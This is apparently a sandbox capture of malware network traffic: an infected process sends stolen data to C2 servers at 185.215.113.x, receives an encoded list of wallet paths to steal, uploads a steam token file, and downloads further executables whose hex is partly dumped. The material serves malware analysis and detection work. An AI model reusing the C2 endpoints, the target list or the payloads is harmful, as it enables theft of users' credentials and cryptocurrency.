Nov 11, 2024 10:33:29.030822992 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:28 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 11, 2024 10:33:29.033227921 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 2d 2d 0d 0a Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="message"files------HIDAFHDHCBGDGCBGCGII--
Nov 11, 2024 10:33:29.237487078 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:29.255239964 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file"------ECBGCGCGIEGCBFHIIEBF--
Nov 11, 2024 10:33:29.950424910 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 11, 2024 10:33:29.981184959 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJECFIECBGDGCAAAEHI Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 43 46 49 45 43 42 47 44 47 43 41 41 41 45 48 49 2d 2d 0d 0a Data Ascii: ------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------JJJECFIECBGDGCAAAEHIContent-Disposition: form-data; name="message"ybncbhylepme------JJJECFIECBGDGCAAAEHI--
Nov 11, 2024 10:33:30.345211983 CET	271	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=
Nov 11, 2024 10:33:32.342453957 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJD Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 34 33 31 65 35 32 30 32 37 61 33 34 62 66 65 32 30 31 36 65 34 35 61 36 63 31 61 61 39 31 38 39 38 35 33 30 64 32 65 32 30 37 36 38 37 37 65 64 64 62 33 65 65 31 35 35 66 63 61 35 39 32 33 62 66 38 61 62 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3431e52027a34bfe2016e45a6c1aa91898530d2e2076877eddb3ee155fca5923bf8ab42c------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIIIIEHCFIECAKFHJD--
Nov 11, 2024 10:33:33.038113117 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 09:33:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49908	185.215.113.16	80	984	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:33:30.357112885 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Nov 11, 2024 10:33:30.995791912 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:33:30 GMT Content-Type: application/octet-stream Content-Length: 3330048 Last-Modified: Mon, 11 Nov 2024 09:18:12 GMT Connection: keep-alive ETag: "6731cbd4-32d000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 ca 01 00 00 00 00 00 00 e0 32 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf2@3(3@Wk22 @.rsrc@.idata @fcsiqomq ,,@cxhhchgb22@.taggant02"2@
Nov 11, 2024 10:33:30.995809078 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:33:30.995820999 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:33:30.995834112 CET	336	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:33:30.996484995 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:33:30.996532917 CET	1236	IN	Data Raw: 02 b3 a3 98 e8 31 a5 b0 8d 32 70 7d 01 d9 a7 18 69 f4 e8 b0 ed 2b ce f6 34 57 b3 1d 36 6f 0b 61 02 b3 a3 98 c8 31 a5 b0 8d 32 70 7d 01 d9 a7 18 71 f4 e8 b0 ed 9b d3 f6 34 57 93 1d 36 6f 0b c1 02 b3 a3 98 a8 31 a5 b0 8d 32 70 7d 01 d9 a7 18 79 f4 Data Ascii: 12p}i+4W6oa12p}q4W6o12p}ys4Ws6o!12p}4WS6oh12p}4W36oH12p}4W6oA(02p}4W6o02p}
Nov 11, 2024 10:33:30.996623039 CET	1236	IN	Data Raw: ed 03 d2 f6 34 57 f3 18 36 6f 0b a1 10 b3 a3 98 08 2c a5 b0 8d 32 70 7d 01 d9 b3 18 e9 f5 e8 b0 ed 07 d9 f6 34 57 d3 18 36 6f 0b 01 11 b3 a3 98 e8 2c a5 b0 8d 32 70 7d 01 d9 b3 18 fd f5 e8 b0 ed d3 d1 f6 34 57 b3 18 36 6f 0b 61 11 b3 a3 98 c8 2c Data Ascii: 4W6o,2p}4W6o,2p}4W6oa,2p}4W6o,2p}1C4Ws6o!,2p}E4WS6oh,2p}]4W36oH,2p}i;4W6oA(+
Nov 11, 2024 10:33:30.996640921 CET	1236	IN	Data Raw: 8d 32 70 7d 01 d9 c7 18 3d fa e8 b0 ed 6b d3 f6 34 57 13 14 36 6f 0b 41 1f b3 a3 98 28 27 a5 b0 8d 32 70 7d 01 d9 df 18 65 fa e8 b0 ed b3 d6 f6 34 57 f3 13 36 6f 0b a1 1f b3 a3 98 08 27 a5 b0 8d 32 70 7d 01 d9 b3 18 a5 fa e8 b0 ed 8b d7 f6 34 57 Data Ascii: 2p}=k4W6oA('2p}e4W6o'2p}4W6o '2p};4W6oa '2p}4W6o '2p}4Ws6o!!'2p}c4WS6o!h'2p}4W3
Nov 11, 2024 10:33:30.996653080 CET	1236	IN	Data Raw: 3c 6f a3 1a 35 c0 8b 87 53 72 a3 33 f9 7b 28 b0 aa 88 8b 81 88 72 a3 77 35 85 a3 b0 34 57 cd fa 37 6f 02 69 4b 6f a3 b0 92 cc 66 32 33 3f ab b0 34 e5 92 99 e4 c2 a6 b0 fb 6f c5 b0 34 6f 8b b9 7e 72 a3 0f ed 91 a3 b0 34 cd 00 74 01 3b 70 7d 01 c4 Data Ascii: <o5Sr3{(rw54W7oiKof23?4o4o~r4t;p}.;p};p}'6{of};p};p}.S344n<=n84l35~qTt;p};p};p}.=z4n3;p};p}.[QIg4-0`-)
Nov 11, 2024 10:33:30.996665001 CET	1236	IN	Data Raw: 8c bf 30 f6 28 d3 46 b1 34 6f a3 3b 2e f8 20 91 c0 b2 b3 3d 82 37 f4 39 b2 4f 8c af 87 70 a3 3b 78 77 2e 24 41 f8 e8 90 fc b4 9f b1 34 6f a3 3b 82 47 29 7a a9 b3 2e 06 11 fa 65 dc f5 f2 9b b3 a6 8f 30 f2 36 f2 9d c1 bd b4 7b 6b 6f 8f a3 b0 c1 b4 Data Ascii: 0(F4o;. =79Op;xw.$A4o;G)z.e06{kokwkvyw$455x47W6o&=;nS43;//`5-3K=9},xDx8_4{i:o3kg4/S0%5
Nov 11, 2024 10:33:31.000741005 CET	1236	IN	Data Raw: 34 6f 2e 26 3d f8 18 9d fc b4 9f b1 34 6f a3 af ab 7f 2e f7 40 6e 74 07 fc b4 9f b2 34 6f a3 98 55 fb a4 b0 9e 83 f9 98 b5 19 a5 b0 b7 33 b4 3b 82 63 08 3a 42 6f a3 b0 34 c8 01 3c 82 5f d7 7d 1d 64 47 b2 34 fa 88 0e f8 c4 2e 9d b8 5b b4 06 9f 83 Data Ascii: 4o.&=4o.@nt4oU3;c:Bo4<_}dG4.[p;w./9k:64ou4oj849{p3w(qv<e4.42zo0$W4n3=z_};p};p};p}.no4QIg4=zcT5o`wzk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	50120	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:04.232623100 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 11, 2024 10:34:04.872629881 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	50121	185.215.113.43	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:06.391720057 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 33 32 44 37 34 42 39 35 44 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7DB32D74B95D82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Nov 11, 2024 10:34:07.046662092 CET	558	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 36 66 0d 0a 20 3c 63 3e 31 30 30 35 35 30 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 35 35 30 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 35 35 30 34 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 64 30 32 34 36 62 35 63 62 34 66 36 35 32 32 34 32 37 66 61 65 31 64 61 61 38 65 39 65 62 34 66 66 66 37 62 35 63 36 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 35 35 30 35 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 [TRUNCATED] Data Ascii: 16f <c>1005502001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1005503001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1005504031+++b5937c1a99d5f9dd0246b5cb4f6522427fae1daa8e9eb4fff7b5c630804042ba5ce902415450#1005505001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	50122	185.215.113.16	80	7772	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 10:34:07.057780027 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 11, 2024 10:34:07.698730946 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 11 Nov 2024 09:34:07 GMT Content-Type: application/octet-stream Content-Length: 3189760 Last-Modified: Mon, 11 Nov 2024 09:17:50 GMT Connection: keep-alive ETag: "6731cbbe-30ac00" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 53 d3 15 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 4a 04 00 00 d6 00 00 00 00 00 00 00 b0 30 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 30 00 00 04 00 00 61 78 31 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 a0 05 00 68 00 00 00 00 90 05 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELSgJ0@0ax1@Th@ @.rsrc@@.idata @egvxbcad**@muahzetc00@.taggant00"0@
Nov 11, 2024 10:34:07.698817015 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:07.699172020 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:07.699184895 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 11, 2024 10:34:07.699872017 CET	1236	IN	Data Raw: 97 f9 d0 79 5a 6e 42 39 43 75 35 47 3b dc 54 c2 17 61 73 d1 8c c7 11 42 d1 e2 85 f7 59 c2 34 ca f6 f9 d1 c4 c1 c5 9d 03 d8 ff 54 e6 22 85 c6 13 d8 f9 0a f6 4a a6 93 bc 0d eb 51 42 50 78 44 37 02 f9 5c e6 de 96 fb ec 56 ef 11 2a 4b 7c 51 ad dd b7 Data Ascii: yZnB9Cu5G;TasBY4T"JQBPxD7\V*K\|QY7Mx_4;a4y_4,E5}v<)v~0[UEzvLvGEv`4a4W@vvK%4$"vT
